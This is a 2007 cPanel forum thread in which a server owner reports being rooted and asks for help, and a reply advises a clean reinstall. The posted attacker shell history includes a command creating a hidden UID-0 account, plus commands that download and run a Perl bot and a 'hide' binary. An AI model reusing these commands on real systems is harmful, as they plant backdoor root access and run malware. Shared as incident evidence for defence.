Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!


Discussion in 'General Discussion' started by w00ts!te, Nov 29, 2007.

  1. w00ts!te

    w00ts!te Registered

    Nov 23, 2007
    Likes Received:
    Trophy Points:
    I got rooted.

    I have recieved this email:

    IMPORTANT: Do not ignore this email.
    This message is to inform you that the account lib has user id 0 (root privs).
    This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

    Syslogd and named is failing every 5 minutes and certain things like disk space usage and connections aren't working in a program I use. What's the best thing to do?

    Few WHM Items:
    Scan for Trojan Horses
    Appears Clean


    Scanning for Trojan Horses.....

    Possible Trojan - /usr/bin/xmlcatalog

    Possible Trojan - /usr/bin/xmllint

    Possible Trojan - /usr/lib/python2.4/site-packages/

    Possible Trojan - /usr/lib/python2.4/site-packages/

    Possible Trojan - /etc/cron.daily/logrotate

    And this is my history:
    58 last
    59 /sbin/ifconfig |grep inet
    60 /usr/sbin/useradd -o -u 0 -g 0 -d /usr/lib/libsh lib
    61 passwd lib
    62 cat /etc/hosts
    63 cat /etc/passwd
    64 su tf4
    65 su tf4
    66 cd /home/tf4
    67 ls
    68 pwd
    69 mkdir .cor ; cd .cor ; lwp-download ; perl bot.txt
    70 passwd mysql
    71 wget ; chmod +x hide ; ./hide

    What can I do? I got rooted big time.
    #1 w00ts!te, Nov 29, 2007
    Last edited: Nov 29, 2007
  2. ToddShipway

    ToddShipway Well-Known Member

    Nov 13, 2006
    Likes Received:
    Trophy Points:
    Houston, TX
    At this point, you definitely want to remove this account. Since the server was rooted, you can attempt to look through access logs to find out exactly how the attacker got this access, but it's hard to say what all was done and it's best to wipe the server and start with a clean OS install to ensure a clean system.
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice